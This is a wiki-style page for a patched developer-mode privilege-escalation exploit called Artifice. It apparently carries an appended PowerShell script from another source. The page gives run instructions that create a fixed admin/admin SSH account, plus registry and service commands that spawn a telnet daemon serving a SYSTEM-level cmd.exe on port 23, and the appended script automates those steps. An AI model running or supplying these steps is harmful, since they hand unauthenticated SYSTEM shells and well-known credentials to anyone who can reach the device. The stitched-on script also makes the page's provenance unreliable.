
Artifice / Devmode privilege escalation exploit

Metadata

Release date 10.09.2023
Author Kudayasu
Classification Devmode SystemOS privilege escalation
Patched Yes
Patch date 08/28/2024
First patched system version 10.0.26100.1968 (xb_flt_2408ge.240821-1830)
Source https://kudayasu.github.io/an-autopsy-of-artifice/
Download https://github.com/Kudayasu/Artifice/releases/latest

Info

A complete privilege escalation exploit for Devmode, granting an admin account in SystemOS.

Prerequisites

  • Windows host computer
  • Console in devmode (UWP devkit or higher)

Instructions

Download the Artifice release, make sure your console is reachable from the host computer, run the program and enter the console's IP address. Then launch the exploit. If it succeeds, an account called admin with password admin will be created in SystemOS, and you can SSH into the console with it. Since the credentials are fixed and well known, anyone who can reach the console's SSH port can use them too, so only do this on a network you control.

System Shell Access

In order to gain a SYSTEM shell, bootsh is used to spawn a telnet daemon on the console, as described below. Note that this exposes cmd.exe running as SYSTEM on TCP port 23 to anything that can reach the console, so only do it on a network you control.

  1. SSH into your console using Command Prompt or PowerShell with the admin account created by Artifice.
  2. Execute the following commands in the SSH session as admin:
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "telnetd.exe cmd.exe 23" /f
    sc start bootsh
    
  3. Wait around 10 seconds to ensure that the telnet service has started.
  4. Reset the registry value back to its original state:
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "xrun.exe SystemBootTasks" /f
    
  5. Now you can start a telnet session on port 23 using PuTTY or a similar telnet client.
  6. Profit.

Authors: Helloyunho, Mick, Stern, Torus
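The six steps above, driven from the Windows host by one PowerShell script instead of being typed into the SSH session by hand. This is an added example, not code from this page or from the Artifice project. It assumes OpenSSH's ssh.exe is on PATH, that the console's SSH server hands commands piped on stdin to cmd.exe, and that Test-NetConnection is available on the host; the function and parameter names are this example's own, while the registry path and values are exactly the ones listed above.

```powershell
# Added example, not part of the page or of Artifice: runs the bootsh telnet procedure
# from the Windows host. Assumptions (not stated on the page): ssh.exe from OpenSSH is on
# PATH, the console's SSH server passes stdin to cmd.exe, Test-NetConnection exists.
param(
    [Parameter(Mandatory = $true)][string]$ConsoleIp,
    [string]$User = 'admin',          # account created by Artifice (password: admin)
    [int]$TelnetPort = 23
)

$regKey = 'HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands'
$originalXrun = 'xrun.exe SystemBootTasks'   # value documented above as the original

# Feeds a batch of cmd.exe lines to the console over SSH on stdin. Piping them avoids
# the quote mangling that happens when a command line containing "..." is passed as an
# ssh.exe argument from PowerShell (the behaviour differs between 5.1 and 7.x).
function Invoke-ConsoleBatch {
    param([string[]]$Lines)
    # "exit" ends the remote cmd.exe so ssh returns instead of waiting on stdin.
    $script = ($Lines + 'exit') -join "`r`n"
    $output = $script | & ssh.exe -o StrictHostKeyChecking=accept-new "$User@$ConsoleIp" 2>&1
    if ($LASTEXITCODE -ne 0) {
        throw "ssh to $ConsoleIp exited with $LASTEXITCODE:`n$($output -join "`n")"
    }
    return $output
}

try {
    # Steps 2-3: point bootsh's Xrun command at telnetd, start the service, let it spawn.
    Invoke-ConsoleBatch @(
        "REG ADD $regKey /v Xrun /t REG_SZ /d `"telnetd.exe cmd.exe $TelnetPort`" /f",
        'sc start bootsh'
    ) | Out-Null
    Start-Sleep -Seconds 10
}
finally {
    # Step 4: always put the original value back, even if starting the service failed.
    Invoke-ConsoleBatch @("REG ADD $regKey /v Xrun /t REG_SZ /d `"$originalXrun`" /f") | Out-Null
}

# Step 5: confirm something is listening before opening PuTTY.
$probe = Test-NetConnection -ComputerName $ConsoleIp -Port $TelnetPort -WarningAction SilentlyContinue
if (-not $probe.TcpTestSucceeded) {
    throw "Nothing is listening on ${ConsoleIp}:$TelnetPort; check the 'sc start bootsh' output and retry."
}
Write-Host "SYSTEM cmd.exe reachable: telnet $ConsoleIp $TelnetPort (PuTTY, connection type Telnet)."
```

Run it as `.\bootsh-telnet.ps1 -ConsoleIp 192.0.2.10` (placeholder address); ssh prompts for the admin password once per batch, so twice in total. The restore runs in the finally block so the Xrun value is put back even when `sc start bootsh` fails, which is the step most worth not forgetting when doing this by hand.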